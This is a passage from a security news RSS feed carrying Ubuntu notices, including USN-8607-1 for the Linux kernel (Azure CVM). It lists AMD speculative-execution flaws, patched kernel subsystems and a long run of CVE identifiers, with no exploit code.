  - Distributed Switch Architecture;
  - IPv4 networking;
  - IPv6 networking;
  - IP tunnels definitions;
  - MAC80211 subsystem;
  - Netfilter;
  - User-space API (UAPI);
  - io_uring subsystem;
  - BPF subsystem;
  - Control group (cgroup);
  - Perf events;
  - Kernel exit() syscall;
  - Kernel fork() syscall;
  - Kernel futex primitives;
  - Kernel kexec() syscall;
  - KProbes tracing;
  - Locking primitives;
  - Kernel module support;
  - Padata parallel execution mechanism;
  - RCU subsystem;
  - Scheduler infrastructure;
  - Cryptographic library;
  - Scatterlist API;
  - Heterogeneous memory management;
  - KASAN memory debugging framework;
  - 9P file system network protocol;
  - Asynchronous Transfer Mode (ATM) subsystem;
  - B.A.T.M.A.N. meshing protocol;
  - Bluetooth subsystem;
  - Ethernet bridge;
  - CAIF protocol;
  - CAN network layer;
  - Ceph Core library;
  - KCM (Kernel Connection Multiplexor) sockets driver;
  - XFRM subsystem;
  - L2TP protocol;
  - Management Component Transport Protocol (MCTP);
  - Multipath TCP;
  - NCSI (Network Controller Sideband Interface) driver;
  - NFC subsystem;
  - Open vSwitch;
  - Packet sockets;
  - Qualcomm IPC Router (QRTR);
  - RDS protocol;
  - RF switch subsystem;
  - Rose network layer;
  - RxRPC session sockets;
  - SCTP protocol;
  - SMC sockets;
  - Stream parser;
  - Sun RPC protocol;
  - TIPC protocol;
  - TLS protocol;
  - Unix domain sockets;
  - VMware vSockets driver;
  - Wireless networking;
  - X.25 network layer;
  - eXpress Data Path;
  - AppArmor security module;
  - Landlock security;
  - Simplified Mandatory Access Control Kernel framework;
  - ALSA framework;
  - Generic PCM loopback sound driver;
  - FireWire sound drivers;
  - HD-audio driver;
  - Creative Sound Blaster X-Fi driver;
  - AMD SoC Alsa drivers;
  - QCOM ASoC drivers;
  - Renesas ASoC drivers;
  - Samsung ASoC drivers;
  - SoC audio core drivers;
  - SOF drivers;
  - STI ASoC drivers;
  - USB sound devices;
  - Objtool;
(CVE-2025-21709, CVE-2025-22116, CVE-2025-38426, CVE-2025-39764,
CVE-2025-40005, CVE-2025-40135, CVE-2025-40150, CVE-2025-68175,
CVE-2025-68239, CVE-2025-68334, CVE-2025-68736, CVE-2025-71152,
CVE-2025-71161, CVE-2025-71203, CVE-2025-71221, CVE-2025-71229,
CVE-2025-71231, CVE-2025-71232, CVE-2025-71233, CVE-2025-71235,
CVE-2025-71236, CVE-2025-71237, CVE-2025-71238, CVE-2025-71239,
CVE-2025-71265, CVE-2025-71266, CVE-2025-71267, CVE-2025-71269,
CVE-2025-71272, CVE-2025-71273, CVE-2025-71274, CVE-2025-71286,
CVE-2025-71287, CVE-2025-71288, CVE-2025-71291, CVE-2025-71292,
CVE-2025-71294, CVE-2025-71295, CVE-2025-71297, CVE-2025-71304,
CVE-2025-71305, CVE-2026-22981, CVE-2026-22985, CVE-2026-22993,
CVE-2026-23004, CVE-2026-23066, CVE-2026-23100, CVE-2026-23104,
CVE-2026-23118, CVE-2026-23138, CVE-2026-23154, CVE-2026-23157,
CVE-2026-23169, CVE-2026-23171, CVE-2026-23207, CVE-2026-23220,
CVE-2026-23221, CVE-2026-23222, CVE-2026-23226, CVE-2026-23227,
CVE-2026-23228, CVE-2026-23229, CVE-2026-23230, CVE-2026-23233,
CVE-2026-23234, CVE-2026-23235, CVE-2026-23236, CVE-2026-23237,
CVE-2026-23238, CVE-2026-23241, CVE-2026-23242, CVE-2026-23243,
CVE-2026-23244, CVE-2026-23245, CVE-2026-23246, CVE-2026-23249,
CVE-2026-23253, CVE-2026-23255, CVE-2026-23266, CVE-2026-23267,
CVE-2026-23270, CVE-2026-23271, CVE-2026-23272, CVE-2026-23276,
CVE-2026-23277, CVE-2026-23278, CVE-2026-23279, CVE-2026-23281,
CVE-2026-23284, CVE-2026-23285, CVE-2026-23286, CVE-2026-23287,
CVE-2026-23289, CVE-2026-23290, CVE-2026-23291, CVE-2026-23292,
CVE-2026-23293, CVE-2026-23296, CVE-2026-23298, CVE-2026-23300,
CVE-2026-23302, CVE-2026-23303, CVE-2026-23304, CVE-2026-23306,
CVE-2026-23307, CVE-2026-23308, CVE-2026-23310, CVE-2026-23312,
CVE-2026-23313, CVE-2026-23315, CVE-2026-23317, CVE-2026-23318,
CVE-2026-23319, CVE-2026-23321, CVE-2026-23324, CVE-2026-23325,
CVE-2026-23330, CVE-2026-23334, CVE-2026-23335, CVE-2026-23336,
CVE-2026-23339, CVE-2026-23340, CVE-2026-23343, CVE-2026-23347,
CVE-2026-23352, CVE-2026-23356, CVE-2026-23357, CVE-2026-23359,
CVE-2026-23360, CVE-2026-23361, CVE-2026-23362, CVE-2026-23363,
CVE-2026-23364, CVE-2026-23365, CVE-2026-23367, CVE-2026-23368,
CVE-2026-23369, CVE-2026-23370, CVE-2026-23372, CVE-2026-23374,
CVE-2026-23375, CVE-2026-23378, CVE-2026-23379, CVE-2026-23381,
CVE-2026-23382, CVE-2026-23383, CVE-2026-23386, CVE-2026-23387,
CVE-2026-23388, CVE-2026-23389, CVE-2026-23391, CVE-2026-23392,
CVE-2026-23395, CVE-2026-23396, CVE-2026-23397, CVE-2026-23398,
CVE-2026-23399, CVE-2026-23401, CVE-2026-23412, CVE-2026-23413,
CVE-2026-23414, CVE-2026-23418, CVE-2026-23419, CVE-2026-23420,
CVE-2026-23426, CVE-2026-23428, CVE-2026-23434, CVE-2026-23438,
CVE-2026-23439, CVE-2026-23440, CVE-2026-23441, CVE-2026-23442,
CVE-2026-23444, CVE-2026-23446, CVE-2026-23447, CVE-2026-23448,
CVE-2026-23449, CVE-2026-23450, CVE-2026-23452, CVE-2026-23454,
CVE-2026-23455, CVE-2026-23456, CVE-2026-23457, CVE-2026-23458,
CVE-2026-23460, CVE-2026-23461, CVE-2026-23462, CVE-2026-23463,
CVE-2026-23464, CVE-2026-23465, CVE-2026-23468, CVE-2026-23470,
CVE-2026-23474, CVE-2026-23475, CVE-2026-31389, CVE-2026-31391,
CVE-2026-31392, CVE-2026-31393, CVE-2026-31394, CVE-2026-31396,
CVE-2026-31399, CVE-2026-31400, CVE-2026-31402, CVE-2026-31403,
CVE-2026-31405, CVE-2026-31407, CVE-2026-31408, CVE-2026-31409,
CVE-2026-31411, CVE-2026-31412, CVE-2026-31414, CVE-2026-31415,
CVE-2026-31416, CVE-2026-31417, CVE-2026-31418, CVE-2026-31421,
CVE-2026-31422, CVE-2026-31423, CVE-2026-31424, CVE-2026-31425,
CVE-2026-31426, CVE-2026-31427, CVE-2026-31428, CVE-2026-31429,
CVE-2026-31430, CVE-2026-31432, CVE-2026-31433, CVE-2026-31434,
CVE-2026-31436, CVE-2026-31438, CVE-2026-31439, CVE-2026-31440,
CVE-2026-31441, CVE-2026-31446, CVE-2026-31447, CVE-2026-31448,
CVE-2026-31449, CVE-2026-31450, CVE-2026-31451, CVE-2026-31452,
CVE-2026-31453, CVE-2026-31454, CVE-2026-31455, CVE-2026-31458,
CVE-2026-31464, CVE-2026-31466, CVE-2026-31467, CVE-2026-31469,
CVE-2026-31470, CVE-2026-31473, CVE-2026-31474, CVE-2026-31476,
CVE-2026-31477, CVE-2026-31478, CVE-2026-31480, CVE-2026-31482,
CVE-2026-31483, CVE-2026-31485, CVE-2026-31487, CVE-2026-31488,
CVE-2026-31489, CVE-2026-31492, CVE-2026-31494, CVE-2026-31495,
CVE-2026-31496, CVE-2026-31497, CVE-2026-31498, CVE-2026-31499,
CVE-2026-31500, CVE-2026-31502, CVE-2026-31503, CVE-2026-31505,
CVE-2026-31506, CVE-2026-31507, CVE-2026-31508, CVE-2026-31509,
CVE-2026-31510, CVE-2026-31511, CVE-2026-31512, CVE-2026-31515,
CVE-2026-31516, CVE-2026-31518, CVE-2026-31519, CVE-2026-31520,
CVE-2026-31521, CVE-2026-31522, CVE-2026-31523, CVE-2026-31524,
CVE-2026-31525, CVE-2026-31527, CVE-2026-31528, CVE-2026-31530,
CVE-2026-31532, CVE-2026-31540, CVE-2026-31542, CVE-2026-31545,
CVE-2026-31546, CVE-2026-31548, CVE-2026-31549, CVE-2026-31550,
CVE-2026-31551, CVE-2026-31552, CVE-2026-31554, CVE-2026-31555,
CVE-2026-31556, CVE-2026-31557, CVE-2026-31563, CVE-2026-31565,
CVE-2026-31566, CVE-2026-31570, CVE-2026-31575, CVE-2026-31576,
CVE-2026-31577, CVE-2026-31578, CVE-2026-31580, CVE-2026-31581,
CVE-2026-31582, CVE-2026-31583, CVE-2026-31584, CVE-2026-31585,
CVE-2026-31586, CVE-2026-31587, CVE-2026-31588, CVE-2026-31590,
CVE-2026-31594, CVE-2026-31595, CVE-2026-31596, CVE-2026-31597,
CVE-2026-31598, CVE-2026-31599, CVE-2026-31602, CVE-2026-31603,
CVE-2026-31604, CVE-2026-31605, CVE-2026-31606, CVE-2026-31607,
CVE-2026-31610, CVE-2026-31611, CVE-2026-31612, CVE-2026-31613,
CVE-2026-31615, CVE-2026-31616, CVE-2026-31617, CVE-2026-31618,
CVE-2026-31619, CVE-2026-31622, CVE-2026-31623, CVE-2026-31624,
CVE-2026-31625, CVE-2026-31626, CVE-2026-31627, CVE-2026-31628,
CVE-2026-31629, CVE-2026-31634, CVE-2026-31637, CVE-2026-31638,
CVE-2026-31639, CVE-2026-31642, CVE-2026-31645, CVE-2026-31646,
CVE-2026-31648, CVE-2026-31649, CVE-2026-31651, CVE-2026-31655,
CVE-2026-31656, CVE-2026-31657, CVE-2026-31658, CVE-2026-31659,
CVE-2026-31660, CVE-2026-31661, CVE-2026-31662, CVE-2026-31664,
CVE-2026-31665, CVE-2026-31667, CVE-2026-31668, CVE-2026-31669,
CVE-2026-31670, CVE-2026-31671, CVE-2026-31672, CVE-2026-31673,
CVE-2026-31674, CVE-2026-31675, CVE-2026-31677, CVE-2026-31678,
CVE-2026-31679, CVE-2026-31680, CVE-2026-31681, CVE-2026-31682,
CVE-2026-31683, CVE-2026-31684, CVE-2026-31685, CVE-2026-31686,
CVE-2026-31687, CVE-2026-31689, CVE-2026-31693, CVE-2026-31694,
CVE-2026-31695, CVE-2026-31696, CVE-2026-31697, CVE-2026-31698,
CVE-2026-31699, CVE-2026-31700, CVE-2026-31701, CVE-2026-31702,
CVE-2026-31704, CVE-2026-31705, CVE-2026-31706, CVE-2026-31707,
CVE-2026-31708, CVE-2026-31709, CVE-2026-31711, CVE-2026-31712,
CVE-2026-31714, CVE-2026-31715, CVE-2026-31716, CVE-2026-31720,
CVE-2026-31721, CVE-2026-31722, CVE-2026-31723, CVE-2026-31724,
CVE-2026-31725, CVE-2026-31726, CVE-2026-31728, CVE-2026-31729,
CVE-2026-31730, CVE-2026-31731, CVE-2026-31737, CVE-2026-31738,
CVE-2026-31740, CVE-2026-31741, CVE-2026-31747, CVE-2026-31748,
CVE-2026-31749, CVE-2026-31751, CVE-2026-31752, CVE-2026-31754,
CVE-2026-31755, CVE-2026-31756, CVE-2026-31758, CVE-2026-31759,
CVE-2026-31761, CVE-2026-31762, CVE-2026-31763, CVE-2026-31767,
CVE-2026-31768, CVE-2026-31770, CVE-2026-31772, CVE-2026-31773,
CVE-2026-31778, CVE-2026-31779, CVE-2026-31780, CVE-2026-31781,
CVE-2026-31788, CVE-2026-43007, CVE-2026-43011, CVE-2026-43012,
CVE-2026-43013, CVE-2026-43014, CVE-2026-43015, CVE-2026-43016,
CVE-2026-43017, CVE-2026-43018, CVE-2026-43019, CVE-2026-43020,
CVE-2026-43023, CVE-2026-43024, CVE-2026-43025, CVE-2026-43026,
CVE-2026-43027, CVE-2026-43028, CVE-2026-43030, CVE-2026-43032,
CVE-2026-43035, CVE-2026-43036, CVE-2026-43037, CVE-2026-43038,
CVE-2026-43040, CVE-2026-43041, CVE-2026-43043, CVE-2026-43044,
CVE-2026-43046, CVE-2026-43047, CVE-2026-43049, CVE-2026-43050,
CVE-2026-43051, CVE-2026-43052, CVE-2026-43054, CVE-2026-43056,
CVE-2026-43057, CVE-2026-43058, CVE-2026-43059, CVE-2026-43060,
CVE-2026-43061, CVE-2026-43062, CVE-2026-43064, CVE-2026-43065,
CVE-2026-43066, CVE-2026-43068, CVE-2026-43069, CVE-2026-43071,
CVE-2026-43072, CVE-2026-43073, CVE-2026-43074, CVE-2026-43075,
CVE-2026-43076, CVE-2026-43079, CVE-2026-43080, CVE-2026-43081,
CVE-2026-43082, CVE-2026-43085, CVE-2026-43086, CVE-2026-43088,
CVE-2026-43089, CVE-2026-43091, CVE-2026-43092, CVE-2026-43093,
CVE-2026-43094, CVE-2026-43098, CVE-2026-43099, CVE-2026-43103,
CVE-2026-43104, CVE-2026-43105, CVE-2026-43107, CVE-2026-43109,
CVE-2026-43110, CVE-2026-43111, CVE-2026-43112, CVE-2026-43113,
CVE-2026-43114, CVE-2026-43117, CVE-2026-43119, CVE-2026-43120,
CVE-2026-43123, CVE-2026-43124, CVE-2026-43128, CVE-2026-43129,
CVE-2026-43130, CVE-2026-43132, CVE-2026-43133, CVE-2026-43134,
CVE-2026-43135, CVE-2026-43136, CVE-2026-43137, CVE-2026-43139,
CVE-2026-43140, CVE-2026-43141, CVE-2026-43143, CVE-2026-43145,
CVE-2026-43147, CVE-2026-43148, CVE-2026-43149, CVE-2026-43150,
CVE-2026-43152, CVE-2026-43153, CVE-2026-43156, CVE-2026-43157,
CVE-2026-43158, CVE-2026-43159, CVE-2026-43162, CVE-2026-43163,
CVE-2026-43167, CVE-2026-43168, CVE-2026-43169, CVE-2026-43170,
CVE-2026-43171, CVE-2026-43173, CVE-2026-43175, CVE-2026-43180,
CVE-2026-43182, CVE-2026-43183, CVE-2026-43184, CVE-2026-43185,
CVE-2026-43186, CVE-2026-43187, CVE-2026-43189, CVE-2026-43190,
CVE-2026-43194, CVE-2026-43196, CVE-2026-43199, CVE-2026-43200,
CVE-2026-43201, CVE-2026-43202, CVE-2026-43203, CVE-2026-43205,
CVE-2026-43206, CVE-2026-43207, CVE-2026-43209, CVE-2026-43211,
CVE-2026-43212, CVE-2026-43214, CVE-2026-43215, CVE-2026-43218,
CVE-2026-43221, CVE-2026-43222, CVE-2026-43223, CVE-2026-43225,
CVE-2026-43226, CVE-2026-43227, CVE-2026-43230, CVE-2026-43231,
CVE-2026-43232, CVE-2026-43233, CVE-2026-43236, CVE-2026-43238,
CVE-2026-43239, CVE-2026-43241, CVE-2026-43242, CVE-2026-43244,
CVE-2026-43245, CVE-2026-43246, CVE-2026-43248, CVE-2026-43249,
CVE-2026-43250, CVE-2026-43251, CVE-2026-43252, CVE-2026-43253,
CVE-2026-43255, CVE-2026-43256, CVE-2026-43257, CVE-2026-43258,
CVE-2026-43261, CVE-2026-43262, CVE-2026-43264, CVE-2026-43265,
CVE-2026-43266, CVE-2026-43268, CVE-2026-43269, CVE-2026-43270,
CVE-2026-43271, CVE-2026-43273, CVE-2026-43275, CVE-2026-43277,
CVE-2026-43278, CVE-2026-43279, CVE-2026-43281, CVE-2026-43283,
CVE-2026-43287, CVE-2026-43288, CVE-2026-43289, CVE-2026-43291,
CVE-2026-43295, CVE-2026-43296, CVE-2026-43297, CVE-2026-43300,
CVE-2026-43302, CVE-2026-43304, CVE-2026-43312, CVE-2026-43313,
CVE-2026-43314, CVE-2026-43315, CVE-2026-43316, CVE-2026-43317,
CVE-2026-43318, CVE-2026-43319, CVE-2026-43320, CVE-2026-43324,
CVE-2026-43327, CVE-2026-43328, CVE-2026-43329, CVE-2026-43330,
CVE-2026-43332, CVE-2026-43333, CVE-2026-43334, CVE-2026-43336,
CVE-2026-43338, CVE-2026-43339, CVE-2026-43340, CVE-2026-43341,
CVE-2026-43342, CVE-2026-43343, CVE-2026-43345, CVE-2026-43350,
CVE-2026-43355, CVE-2026-43357, CVE-2026-43359, CVE-2026-43360,
CVE-2026-43361, CVE-2026-43363, CVE-2026-43365, CVE-2026-43366,
CVE-2026-43368, CVE-2026-43370, CVE-2026-43372, CVE-2026-43373,
CVE-2026-43377, CVE-2026-43378, CVE-2026-43380, CVE-2026-43381,
CVE-2026-43382, CVE-2026-43383, CVE-2026-43384, CVE-2026-43386,
CVE-2026-43387, CVE-2026-43395, CVE-2026-43397, CVE-2026-43405,
CVE-2026-43406, CVE-2026-43407, CVE-2026-43408, CVE-2026-43409,
CVE-2026-43411, CVE-2026-43412, CVE-2026-43413, CVE-2026-43414,
CVE-2026-43415, CVE-2026-43419, CVE-2026-43420, CVE-2026-43421,
CVE-2026-43424, CVE-2026-43425, CVE-2026-43426, CVE-2026-43427,
CVE-2026-43428, CVE-2026-43429, CVE-2026-43430, CVE-2026-43432,
CVE-2026-43436, CVE-2026-43437, CVE-2026-43439, CVE-2026-43441,
CVE-2026-43445, CVE-2026-43448, CVE-2026-43449, CVE-2026-43450,
CVE-2026-43451, CVE-2026-43452, CVE-2026-43453, CVE-2026-43455,
CVE-2026-43456, CVE-2026-43457, CVE-2026-43458, CVE-2026-43459,
CVE-2026-43466, CVE-2026-43467, CVE-2026-43468, CVE-2026-43469,
CVE-2026-43471, CVE-2026-43472, CVE-2026-43473, CVE-2026-43475,
CVE-2026-43476, CVE-2026-43480, CVE-2026-43483, CVE-2026-43484,
CVE-2026-43488, CVE-2026-43490, CVE-2026-43491, CVE-2026-43492,
CVE-2026-43493, CVE-2026-43495, CVE-2026-43496, CVE-2026-43497,
CVE-2026-43499, CVE-2026-43501, CVE-2026-43502, CVE-2026-45834,
CVE-2026-45835, CVE-2026-45836, CVE-2026-45838, CVE-2026-45839,
CVE-2026-45840, CVE-2026-45841, CVE-2026-45842, CVE-2026-45843,
CVE-2026-45844, CVE-2026-45845, CVE-2026-45846, CVE-2026-45847,
CVE-2026-45848, CVE-2026-45849, CVE-2026-45851, CVE-2026-45852,
CVE-2026-45855, CVE-2026-45856, CVE-2026-45857, CVE-2026-45858,
CVE-2026-45859, CVE-2026-45860, CVE-2026-45861, CVE-2026-45862,
CVE-2026-45864, CVE-2026-45865, CVE-2026-45866, CVE-2026-45867,
CVE-2026-45868, CVE-2026-45869, CVE-2026-45870, CVE-2026-45871,
CVE-2026-45872, CVE-2026-45873, CVE-2026-45875, CVE-2026-45877,
CVE-2026-45878, CVE-2026-45879, CVE-2026-45880, CVE-2026-45881,
CVE-2026-45882, CVE-2026-45883, CVE-2026-45884, CVE-2026-45885,
CVE-2026-45886, CVE-2026-45890, CVE-2026-45891, CVE-2026-45893,
CVE-2026-45895, CVE-2026-45899, CVE-2026-45902, CVE-2026-45904,
CVE-2026-45905, CVE-2026-45910, CVE-2026-45911, CVE-2026-45912,
CVE-2026-45913, CVE-2026-45914, CVE-2026-45915, CVE-2026-45916,
CVE-2026-45917, CVE-2026-45919, CVE-2026-45920, CVE-2026-45921,
CVE-2026-45923, CVE-2026-45924, CVE-2026-45928, CVE-2026-45935,
CVE-2026-45936, CVE-2026-45938, CVE-2026-45941, CVE-2026-45942,
CVE-2026-45943, CVE-2026-45946, CVE-2026-45947, CVE-2026-45948,
CVE-2026-45954, CVE-2026-45956, CVE-2026-45957, CVE-2026-45958,
CVE-2026-45960, CVE-2026-45962, CVE-2026-45964, CVE-2026-45965,
CVE-2026-45968, CVE-2026-45969, CVE-2026-45970, CVE-2026-45972,
CVE-2026-45973, CVE-2026-45974, CVE-2026-45976, CVE-2026-45978,
CVE-2026-45981, CVE-2026-45982, CVE-2026-45983, CVE-2026-45984,
CVE-2026-45985, CVE-2026-45986, CVE-2026-45987, CVE-2026-45988,
CVE-2026-45989, CVE-2026-45991, CVE-2026-45994, CVE-2026-45996,
CVE-2026-45997, CVE-2026-45999, CVE-2026-46002, CVE-2026-46003,
CVE-2026-46004, CVE-2026-46005, CVE-2026-46006, CVE-2026-46007,
CVE-2026-46009, CVE-2026-46011, CVE-2026-46012, CVE-2026-46015,
CVE-2026-46016, CVE-2026-46018, CVE-2026-46019, CVE-2026-46021,
CVE-2026-46022, CVE-2026-46023, CVE-2026-46024, CVE-2026-46026,
CVE-2026-46027, CVE-2026-46031, CVE-2026-46033, CVE-2026-46037,
CVE-2026-46038, CVE-2026-46040, CVE-2026-46041, CVE-2026-46043,
CVE-2026-46044, CVE-2026-46046, CVE-2026-46047, CVE-2026-46049,
CVE-2026-46050, CVE-2026-46051, CVE-2026-46052, CVE-2026-46053,
CVE-2026-46056, CVE-2026-46058, CVE-2026-46061, CVE-2026-46062,
CVE-2026-46063, CVE-2026-46064, CVE-2026-46065, CVE-2026-46068,
CVE-2026-46069, CVE-2026-46070, CVE-2026-46072, CVE-2026-46073,
CVE-2026-46075, CVE-2026-46076, CVE-2026-46077, CVE-2026-46078,
CVE-2026-46079, CVE-2026-46080, CVE-2026-46082, CVE-2026-46083,
CVE-2026-46084, CVE-2026-46086, CVE-2026-46088, CVE-2026-46089,
CVE-2026-46090, CVE-2026-46091, CVE-2026-46092, CVE-2026-46094,
CVE-2026-46098, CVE-2026-46099, CVE-2026-46101, CVE-2026-46102,
CVE-2026-46103, CVE-2026-46106, CVE-2026-46107, CVE-2026-46108,
CVE-2026-46110, CVE-2026-46111, CVE-2026-46112, CVE-2026-46113,
CVE-2026-46114, CVE-2026-46115, CVE-2026-46116, CVE-2026-46117,
CVE-2026-46119, CVE-2026-46120, CVE-2026-46121, CVE-2026-46122,
CVE-2026-46123, CVE-2026-46124, CVE-2026-46125, CVE-2026-46126,
CVE-2026-46127, CVE-2026-46128, CVE-2026-46129, CVE-2026-46131,
CVE-2026-46132, CVE-2026-46133, CVE-2026-46135, CVE-2026-46136,
CVE-2026-46137, CVE-2026-46138, CVE-2026-46139, CVE-2026-46142,
CVE-2026-46143, CVE-2026-46144, CVE-2026-46145, CVE-2026-46146,
CVE-2026-46149, CVE-2026-46150, CVE-2026-46151, CVE-2026-46152,
CVE-2026-46157, CVE-2026-46159, CVE-2026-46160, CVE-2026-46161,
CVE-2026-46163, CVE-2026-46164, CVE-2026-46167, CVE-2026-46168,
CVE-2026-46169, CVE-2026-46172, CVE-2026-46173, CVE-2026-46174,
CVE-2026-46176, CVE-2026-46177, CVE-2026-46178, CVE-2026-46179,
CVE-2026-46180, CVE-2026-46184, CVE-2026-46185, CVE-2026-46186,
CVE-2026-46187, CVE-2026-46189, CVE-2026-46190, CVE-2026-46191,
CVE-2026-46193, CVE-2026-46194, CVE-2026-46195, CVE-2026-46196,
CVE-2026-46197, CVE-2026-46198, CVE-2026-46199, CVE-2026-46200,
CVE-2026-46201, CVE-2026-46204, CVE-2026-46205, CVE-2026-46206,
CVE-2026-46207, CVE-2026-46208, CVE-2026-46209, CVE-2026-46211,
CVE-2026-46212, CVE-2026-46214, CVE-2026-46218, CVE-2026-46219,
CVE-2026-46220, CVE-2026-46225, CVE-2026-46226, CVE-2026-46227,
CVE-2026-46229, CVE-2026-46230, CVE-2026-46231, CVE-2026-46232,
CVE-2026-46233, CVE-2026-46234, CVE-2026-46235, CVE-2026-46236,
CVE-2026-46238, CVE-2026-46241, CVE-2026-46243, CVE-2026-46244,
CVE-2026-46246, CVE-2026-46247, CVE-2026-46249, CVE-2026-46250,
CVE-2026-46251, CVE-2026-46253, CVE-2026-46254, CVE-2026-46255,
CVE-2026-46259, CVE-2026-46260, CVE-2026-46261, CVE-2026-46265,
CVE-2026-46266, CVE-2026-46267, CVE-2026-46270, CVE-2026-46273,
CVE-2026-46274, CVE-2026-46280, CVE-2026-46282, CVE-2026-46285,
CVE-2026-46286, CVE-2026-46287, CVE-2026-46289, CVE-2026-46291,
CVE-2026-46292, CVE-2026-46293, CVE-2026-46294, CVE-2026-46296,
CVE-2026-46299, CVE-2026-46301, CVE-2026-46303, CVE-2026-46304,
CVE-2026-46306, CVE-2026-46307, CVE-2026-46312, CVE-2026-46314,
CVE-2026-46319, CVE-2026-46328, CVE-2026-52911, CVE-2026-52920,
CVE-2026-52925, CVE-2026-52933, CVE-2026-52936, CVE-2026-52951,
CVE-2026-52954, CVE-2026-52955, CVE-2026-52957, CVE-2026-52958,
CVE-2026-52961, CVE-2026-52962, CVE-2026-52963, CVE-2026-52964,
CVE-2026-52967, CVE-2026-52968, CVE-2026-52969, CVE-2026-52970,
CVE-2026-52974, CVE-2026-52975, CVE-2026-52977, CVE-2026-52981,
CVE-2026-52982, CVE-2026-52984, CVE-2026-52985, CVE-2026-52986,
CVE-2026-52989, CVE-2026-52990, CVE-2026-52992, CVE-2026-52993,
CVE-2026-52995, CVE-2026-52998, CVE-2026-52999, CVE-2026-53001,
CVE-2026-53002, CVE-2026-53003, CVE-2026-53004, CVE-2026-53006,
CVE-2026-53011, CVE-2026-53012, CVE-2026-53013, CVE-2026-53014,
CVE-2026-53015, CVE-2026-53016, CVE-2026-53021, CVE-2026-53022,
CVE-2026-53023, CVE-2026-53032, CVE-2026-53033, CVE-2026-53034,
CVE-2026-53035, CVE-2026-53036, CVE-2026-53037, CVE-2026-53039,
CVE-2026-53040, CVE-2026-53041, CVE-2026-53043, CVE-2026-53045,
CVE-2026-53046, CVE-2026-53047, CVE-2026-53048, CVE-2026-53049,
CVE-2026-53050, CVE-2026-53052, CVE-2026-53056, CVE-2026-53058,
CVE-2026-53059, CVE-2026-53060, CVE-2026-53061, CVE-2026-53062,
CVE-2026-53063, CVE-2026-53064, CVE-2026-53065, CVE-2026-53066,
CVE-2026-53068, CVE-2026-53069, CVE-2026-53071, CVE-2026-53072,
CVE-2026-53073, CVE-2026-53074, CVE-2026-53075, CVE-2026-53076,
CVE-2026-53077, CVE-2026-53082, CVE-2026-53083, CVE-2026-53084,
CVE-2026-53085, CVE-2026-53086, CVE-2026-53088, CVE-2026-53093,
CVE-2026-53094, CVE-2026-53096, CVE-2026-53097, CVE-2026-53098,
CVE-2026-53110, CVE-2026-53111, CVE-2026-53112, CVE-2026-53115,
CVE-2026-53117, CVE-2026-53122, CVE-2026-53123, CVE-2026-53126,
CVE-2026-53128, CVE-2026-53130, CVE-2026-53279, CVE-2026-53287,
CVE-2026-53289, CVE-2026-53291, CVE-2026-53293, CVE-2026-53294,
CVE-2026-53295, CVE-2026-53296, CVE-2026-53303, CVE-2026-53304,
CVE-2026-53306, CVE-2026-53309, CVE-2026-53314, CVE-2026-53320,
CVE-2026-53369, CVE-2026-53374, CVE-2026-53375, CVE-2026-53376,
CVE-2026-53379, CVE-2026-63838, CVE-2026-63843, CVE-2026-63844,
CVE-2026-63845, CVE-2026-63846, CVE-2026-63847, CVE-2026-63848,
CVE-2026-63851, CVE-2026-63852, CVE-2026-63854, CVE-2026-63855,
CVE-2026-63856, CVE-2026-63860, CVE-2026-63861, CVE-2026-63862,
CVE-2026-63865, CVE-2026-64018, CVE-2026-64034)]]></content:encoded>
</item>
<item>
<title><![CDATA[USN-8607-1: Linux kernel (Azure CVM) vulnerabilities]]></title>
<description><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shar...]]></description>
<link>https://tsecurity.de/de/3691497/unix-server/usn-8607-1-linux-kernel-azure-cvm-vulnerabilities/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3691497/unix-server/usn-8607-1-linux-kernel-azure-cvm-vulnerabilities/</guid>
<pubDate>Fri, 24 Jul 2026 14:17:40 +0200</pubDate>
<category>🐧 Unix Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[It was discovered that some AMD processors did not properly clear data in
the floating point divider unit during speculative execution. A local
attacker could use this to expose sensitive information. (CVE-2025-54505)

It was discovered that some AMD Zen 2 processors did not properly isolate
shared resources in the operation cache. A local attacker could possibly
use this issue to corrupt instructions executed at a higher privilege
level, resulting in privilege escalation. (CVE-2025-54518)

It was discovered that some AMD Zen 5 processors supporting RDSEED
instruction did not properly handle entropy, potentially resulting in the
consumption of insufficiently random values. A local attacker could
possibly use this issue to influence the values returned by the RDSEED
instruction causing loss of confidentiality and integrity. (CVE-2025-62626)

Several security issues were discovered in the Linux kernel.
An attacker could possibly use these to compromise the system.
This update corrects flaws in the following subsystems:
  - ARM64 architecture;
  - MIPS architecture;
  - PowerPC architecture;
  - RISC-V architecture;
  - S390 architecture;
  - x86 architecture;
  - Block layer subsystem;
  - Cryptographic API;
  - Compute Acceleration Framework;
  - ACPI drivers;
  - Serial ATA and Parallel ATA drivers;
  - ATM drivers;
  - Drivers core;
  - Power management core;
  - DRBD Distributed Replicated Block Device drivers;
  - Rados block device (RBD) driver;
  - RNBD block device driver;
  - Ublk userspace block driver;
  - Compressed RAM block device driver;
  - Bluetooth drivers;
  - Bus devices;
  - Character device driver;
  - TPM device driver;
  - Clock framework and drivers;
  - Clocksource drivers;
  - Data acquisition framework and drivers;
  - Counter interface drivers;
  - CPU frequency scaling framework;
  - CPU idle management framework;
  - Hardware crypto device drivers;
  - CXL (Compute Express Link) drivers;
  - DMA engine subsystem;
  - EDAC drivers;
  - EFI core;
  - GPIO subsystem;
  - GPU drivers;
  - Greybus drivers;
  - HID subsystem;
  - Hardware monitoring drivers;
  - I2C subsystem;
  - IIO subsystem;
  - IIO ADC drivers;
  - InfiniBand drivers;
  - Input Device (Miscellaneous) drivers;
  - IOMMU subsystem;
  - IRQ chip drivers;
  - LED subsystem;
  - Mailbox framework;
  - Multiple devices driver;
  - Media drivers;
  - MediaTek SMI driver;
  - NVIDIA Tegra memory controller driver;
  - Multifunction device drivers;
  - Broadcom VK accelerator driver;
  - Fastrpc Driver;
  - IBM Advanced System Management driver;
  - MMC subsystem;
  - MOST (Media Oriented Systems Transport) drivers;
  - MTD block device drivers;
  - Network drivers;
  - Ethernet bonding driver;
  - Mellanox network drivers;
  - Microsoft Azure Network Adapter (MANA) driver;
  - STMicroelectronics network drivers;
  - Ethernet team driver;
  - MediaTek network drivers;
  - Near Field Communication (NFC) drivers;
  - NTB driver;
  - NVDIMM (Non-Volatile Memory Device) drivers;
